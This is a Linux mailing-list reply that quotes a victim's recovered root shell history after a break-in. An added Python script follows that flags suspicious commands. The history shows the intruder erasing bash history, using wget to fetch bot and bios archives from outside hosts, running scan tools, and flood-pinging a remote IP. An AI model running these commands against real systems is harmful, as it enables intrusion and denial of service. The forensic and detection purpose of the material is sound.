Looks like you've got Romanian script kiddies in your computer.  Well,
they have stuff stashed on Romanian servers anyway.  I'm curious about
this stuff myself.  I guess bot.tgz is a program that flood pings
203.144.243.10 (Asahi-Somboon ONLINE?)  What's bios.tgz?  And what are
the scan and serv commands doing with those IP addresses?  Hmmm?

> I think I have found the answer to my problems.  I got into a shell using
> disc 1 of the installation CDs.  I switched to super user mode and saw
> various commands in the history that were not mine.  Someone got in earlier
> this week and did some bad things to my system.  Below is the history if
> anyone is interested in seeing what they were up to.  Any explanation of
> what they did is welcome.  It was pretty much a fresh install, so I wiped
> the disc and I am reinstalling.  I think I need to learn much more about
> security.
> 
> TOm
> 
> history
> rm -rf .bash_history
> ls -al
> w
> cd /tmp/.cfg/
> cd samba
> ./scan 217 139 97 1
> ./scan 62 139 217 98
> ./serv 67.160.4.66
> ./scan 67 139 160 4
> ./scan 217 139 0 1
> ls -alF
> cat /etc/issue
> tar
> cd /tmp
> cd sh
> ls -alF
> tar -xzvf sh.tgz
> exit
> id
> wget djcc.go.ro/bios.tgz
> tar -xzvf bios.tgz
> tar -xzvf bios.tgz
> ls
> rm -rf bios.tgz
> ls
> ps -aux
> cat /proc/cpuinfo
> exit
> chmod 700 inst
> chmod +x inst
> exit
> mkdir /dev/targa
> cd /dev/targa
> wget mihai-doini.org/bot.tgz
> tar -xzvf bot.tgz
> exit
> ping -s -f 203.144.243.10 65500&
> ping -f -s 203.144.243.10 65500&
> ping -s -f 203.144.243.10 65500&
> ls
> cd /
> ping -s -f 203.144.243.10 65500&
> history | more
> history | vim
> history -w /tmp/hist.txt
> 
> 
> 
> _______________________________________________
> TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> http://www.mn-linux.org tclug-list at mn-linux.org
> https://mailman.real-time.com/mailman/listinfo/tclug-list
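
A triage pass over a recovered shell history like the one quoted above, as an added example that is not part of the original thread. The rule names and regular expressions are assumptions chosen for illustration, and the sample lines are excerpted from the quoted history.

```python
import re

# Heuristic rules for triaging a recovered shell history.
# Rule names and patterns are assumptions for this example, not an established ruleset.
RULES = [
    ("history-tampering", re.compile(r"\brm\b.*\.bash_history")),
    ("hidden-dir-in-tmp", re.compile(r"(?:^|\s)/tmp/\.[\w-]+")),
    ("dir-created-in-dev", re.compile(r"\bmkdir\b.*\s/dev/\S+")),
    ("remote-archive-fetch", re.compile(r"\b(?:wget|curl)\b.*\.(?:tgz|tar\.gz|tar)\b")),
    ("flood-ping", re.compile(r"\bping\b.*\s-f\b")),
    ("host-survey", re.compile(r"\bcat\s+/(?:etc/issue|proc/cpuinfo)\b")),
]

def triage(history_text):
    """Return (line number, rule name, command) for every rule a line matches."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        cmd = line.strip()
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append((lineno, name, cmd))
    return findings

def summarize(findings):
    """Count findings per rule so the most frequent behaviour stands out."""
    counts = {}
    for _, name, _ in findings:
        counts[name] = counts.get(name, 0) + 1
    return counts

# Sample input: lines excerpted from the history quoted in this thread.
SAMPLE = """\
rm -rf .bash_history
cd /tmp/.cfg/
cat /etc/issue
wget djcc.go.ro/bios.tgz
rm -rf bios.tgz
cat /proc/cpuinfo
mkdir /dev/targa
wget mihai-doini.org/bot.tgz
ping -s -f 203.144.243.10 65500&
ping -f -s 203.144.243.10 65500&
ls -alF
"""

if __name__ == "__main__":
    for lineno, name, cmd in triage(SAMPLE):
        print(f"{lineno:>3}  {name:<22} {cmd}")
```

A clean result from such a pass proves nothing, since the first command in this history shows the intruder deleting `.bash_history`; hits only tell you where to look first.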

